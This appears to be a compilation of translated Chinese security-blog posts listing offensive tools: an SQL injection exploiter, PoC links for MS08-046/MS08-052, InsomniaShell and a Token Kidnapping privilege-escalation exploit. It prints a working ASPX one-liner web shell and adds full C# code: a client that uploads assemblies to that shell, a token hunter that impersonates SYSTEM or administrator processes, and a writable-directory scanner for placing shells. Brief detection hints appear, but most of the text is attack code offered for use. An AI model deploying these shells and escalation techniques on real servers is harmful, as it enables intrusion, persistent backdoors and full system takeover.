Introduction
Mini MySqlat0r is a multi-platform application used to audit web sites in order to discover and exploit SQL injection vulnerabilities. It is written in Java and is used through a user-friendly GUI that contains three distinct modules.
The Crawler module allows the user to view the web site structure and gather all tamperable parameters. These parameters are then passed to the Tester module, which tests each parameter for SQL injection vulnerabilities. Any that are found are then sent to the Exploiter module, which exploits the injections to extract data from the database.
Tags: JAVA, MySQL, SQL Injection, SQL注入 (SQL injection)
鬼仔's note: I just got back and saw the message cnqing had left me on GTalk; all he sent was a link.
Author: cnqing
Software description:
The package includes a reflection-based .NET one-liner shell (一句话木马). The page reads as many bytes of the request body as the `psw` cookie specifies, loads them as an assembly with Assembly.Load, and instantiates a type named "c" from it, passing the executing Page object; nothing is written to disk, and the empty catch block makes the page respond silently when the cookie is missing or the payload fails to load.
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
Client plugins currently included: file management, .NET probe, CMD shell, port forwarding.
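As an added example (not code from cnqing's package), the contract the one-liner above imposes on its payload, plus a client that delivers it. The one thing fixed by the loader is that the uploaded assembly must expose a public type named "c" (the lookup is case-insensitive) with a public constructor accepting the Page, because CreateInstance is called with `new object[] { this }` and everything the payload does has to happen inside that constructor. The file name `payload.dll`, the target URL and the `Client` class are assumptions of this example.

```csharp
// Added example, not cnqing's code. One source file, two builds:
//   csc /target:library /reference:System.Web.dll loader_demo.cs   -> payload.dll
//   csc /target:exe     /reference:System.Web.dll loader_demo.cs   -> client.exe
// The loader only instantiates "c", so the Client type inside payload.dll is inert.
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Web.UI;

// ---- payload side: the loader runs
//   Assembly.Load(<psw bytes of body>).CreateInstance("c", true, BindingFlags.Default,
//                                                     null, new object[] { this }, null, null);
// so the only entry point is a constructor of a type named "c" that takes the Page.
public class c
{
    public c(Page page)
    {
        // Harmless demonstration body: report the identity and process the page runs under.
        page.Response.ContentType = "text/plain";
        page.Response.Write("pid=" + Process.GetCurrentProcess().Id + "\n");
        page.Response.Write("user=" + Environment.UserName + "\n");
        page.Response.Write("cwd=" + Environment.CurrentDirectory + "\n");
    }
}

// ---- client side: POSTs the compiled payload to the uploaded one-liner.
// argv[0] = URL of the .aspx (assumed), argv[1] = path to payload.dll (assumed).
static class Client
{
    static void Main(string[] args)
    {
        string url = args.Length > 0 ? args[0] : "http://target/upload/x.aspx"; // assumption
        byte[] payload = File.ReadAllBytes(args.Length > 1 ? args[1] : "payload.dll");

        HttpWebRequest req = (HttpWebRequest)WebRequest.Create(url);
        req.Method = "POST";
        req.ContentType = "application/octet-stream";
        req.ContentLength = payload.Length;

        // The psw cookie is the byte count Request.BinaryRead() will consume. It must equal
        // the assembly length: a smaller value hands Assembly.Load a truncated image, a larger
        // one makes BinaryRead throw, and either way the empty catch returns a blank page.
        req.CookieContainer = new CookieContainer();
        req.CookieContainer.Add(new Uri(url), new Cookie("psw", payload.Length.ToString()));

        using (Stream body = req.GetRequestStream())
            body.Write(payload, 0, payload.Length);

        using (WebResponse resp = req.GetResponse())
        using (StreamReader reader = new StreamReader(resp.GetResponseStream()))
            Console.Write(reader.ReadToEnd());
    }
}
```

Because the page answers with an empty 200 whenever the cookie is absent, fetching candidate .aspx files with a plain GET does not reveal the shell; reviewing the page source for `Assembly.Load(Request.BinaryRead(` or watching for POSTs carrying a numeric `psw` cookie and an MZ header in the body is what actually finds it.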
Tags: ASP.Net, ASPX, ASPXshell, 一句话马 (one-liner shell)
EMR_SETICMPROFILEA Heap Overflow DoS
By Ac!dDrop
Related to MS08-046
Tested on Windows XP Professional SP2
mscms.dll 5.1.2600.2709
gdi32.dll 5.1.2600.2818
Tags: MS08-046, PoC
—————————————————————————————–
Operating System: XP SP2
Gdiplus.dll Version: 5.1.3102.2180
Credit: John Smith, Evil Fingers
GIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt
PoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt
http://www.evilfingers.com/patchTuesday/PoC.php
========================================================================
Tags: GDI+, MS08-052
InsomniaShell is a tool for use during penetration tests when you have the ability to upload or create an arbitrary .aspx page. The .aspx page is an example of using native calls through P/Invoke to provide either a reverse shell or a bind shell.
It has the added advantage of searching through all accessible processes for a SYSTEM or Administrator token to use for impersonation. InsomniaShell.zip
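As an added example (not InsomniaShell's own code), the token search the description refers to, done through P/Invoke as a console program so the logic is visible on its own; the class and method names are this example's. It opens every process the current identity can reach, inspects the owner of its primary token, and impersonates the first one owned by SYSTEM or by a member of the local Administrators group. The caller needs SeImpersonatePrivilege, which IIS worker identities hold by default and which is why the technique works from a web shell; processes whose DACL denies the caller are simply skipped.

```csharp
// Added example, not InsomniaShell's code. Requires SeImpersonatePrivilege.
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;

static class TokenHunter
{
    const uint PROCESS_QUERY_INFORMATION = 0x0400;
    const uint TOKEN_QUERY       = 0x0008;
    const uint TOKEN_DUPLICATE   = 0x0002;
    const uint TOKEN_IMPERSONATE = 0x0004;

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr OpenProcess(uint access, bool inherit, int pid);

    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool OpenProcessToken(IntPtr process, uint access, out IntPtr token);

    // With a primary token this needs TOKEN_QUERY | TOKEN_DUPLICATE; it duplicates internally.
    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool ImpersonateLoggedOnUser(IntPtr token);

    [DllImport("advapi32.dll", SetLastError = true)]
    static extern bool RevertToSelf();

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr handle);

    // Returns a token handle owned by SYSTEM or a local admin, or IntPtr.Zero.
    // The caller owns the returned handle and must CloseHandle() it.
    public static IntPtr FindPrivilegedToken(out string owner)
    {
        owner = null;
        foreach (Process p in Process.GetProcesses())
        {
            IntPtr hProc = OpenProcess(PROCESS_QUERY_INFORMATION, false, p.Id);
            if (hProc == IntPtr.Zero) continue;           // access denied: not reachable
            IntPtr hTok;
            bool ok = OpenProcessToken(hProc, TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_IMPERSONATE, out hTok);
            CloseHandle(hProc);
            if (!ok) continue;

            // WindowsIdentity duplicates the handle, so hTok stays valid for the caller.
            WindowsIdentity id = new WindowsIdentity(hTok);
            bool isSystem = id.User.IsWellKnown(WellKnownSidType.LocalSystemSid);
            bool isAdmin  = new WindowsPrincipal(id).IsInRole(WindowsBuiltInRole.Administrator);
            if (isSystem || isAdmin)
            {
                owner = id.Name;
                return hTok;
            }
            CloseHandle(hTok);
        }
        return IntPtr.Zero;
    }

    static void Main()
    {
        string owner;
        IntPtr tok = FindPrivilegedToken(out owner);
        if (tok == IntPtr.Zero)
        {
            Console.WriteLine("no usable token reachable from " + WindowsIdentity.GetCurrent().Name);
            return;
        }
        try
        {
            if (!ImpersonateLoggedOnUser(tok))
                throw new Win32Exception(Marshal.GetLastWin32Error());
            Console.WriteLine("took token of " + owner + "; now running as "
                              + WindowsIdentity.GetCurrent().Name);
            // A shell would be wired to a socket here; this example only proves the identity.
        }
        finally
        {
            RevertToSelf();      // the impersonation is per-thread; always undo it
            CloseHandle(tok);
        }
    }
}
```

Impersonation only changes the calling thread's token; a child process started afterwards with Process.Start still inherits the worker's primary token, which is why shells of this kind either duplicate the token to a primary one for CreateProcessAsUser or keep the work on the impersonating thread.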
Tags: WebShell
Author: cnqing
ScanWriterable.aspx
<%@ Page Language="C#" ValidateRequest="false" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Text" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>ScanWriterable</title>
</head>
<body>
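As an added example (not cnqing's ScanWriterable.aspx, whose body is not reproduced above), the probe such a page performs under the worker process identity: for each directory it tries to create and then delete a uniquely named file, which is the only reliable test, since reading the ACL misses deny entries, inherited rights and share-level limits. The root directory and depth below are assumptions; a real page would take them from a form field, which is why the header above disables request validation.

```csharp
// Added example, not cnqing's code. Run as the identity whose write access you want to map.
using System;
using System.Collections.Generic;
using System.IO;

public static class WritableScan
{
    // True only if a file could actually be created in dir under the current identity.
    // A missing or unlistable directory surfaces as an IOException and reports false.
    public static bool IsWritable(string dir)
    {
        string probe = Path.Combine(dir, Path.GetRandomFileName());
        try
        {
            using (FileStream fs = new FileStream(probe, FileMode.CreateNew, FileAccess.Write))
                fs.WriteByte(0);
            return true;
        }
        catch (UnauthorizedAccessException) { return false; }
        catch (IOException) { return false; }
        finally
        {
            // Never leave the probe behind: it is noise for the tester and an IOC for the defender.
            // (A directory that grants create but not delete will keep it; that is rare.)
            try { if (File.Exists(probe)) File.Delete(probe); }
            catch (UnauthorizedAccessException) { }
            catch (IOException) { }
        }
    }

    // Walks root up to maxDepth levels deep and returns every writable directory found.
    public static List<string> Scan(string root, int maxDepth)
    {
        var found = new List<string>();
        var stack = new Stack<KeyValuePair<string, int>>();
        stack.Push(new KeyValuePair<string, int>(root, 0));
        while (stack.Count > 0)
        {
            KeyValuePair<string, int> cur = stack.Pop();
            if (IsWritable(cur.Key)) found.Add(cur.Key);
            if (cur.Value >= maxDepth) continue;
            string[] subs;
            try { subs = Directory.GetDirectories(cur.Key); }
            catch (UnauthorizedAccessException) { continue; }   // cannot list: skip subtree
            catch (IOException) { continue; }
            foreach (string s in subs)
                stack.Push(new KeyValuePair<string, int>(s, cur.Value + 1));
        }
        return found;
    }

    static void Main(string[] args)
    {
        string root = args.Length > 0 ? args[0] : @"C:\Inetpub"; // assumption
        foreach (string d in Scan(root, 3)) Console.WriteLine(d);
    }
}
```

A writable directory inside the web root is the interesting result: it is where a dropped .aspx becomes reachable over HTTP, so the same check, run from the defender's side as the application pool identity, tells you where a shell could land.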
Tags: ASPX
鬼仔: Works great for privilege escalation, straight to SYSTEM. A test screenshot from over at TR's is attached at the end of the post.
Compiled binary: http://www.blogjava.net/Files/baicker/Churrasco.rar (via 009)
From: http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html
It has been a long time since the Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf) was published, so I decided to release a PoC exploit for Win2k3 that allows executing code under the SYSTEM account.
Tags: Exploit, PoC, Token Kidnapping, Windows 2003, 提权 (privilege escalation)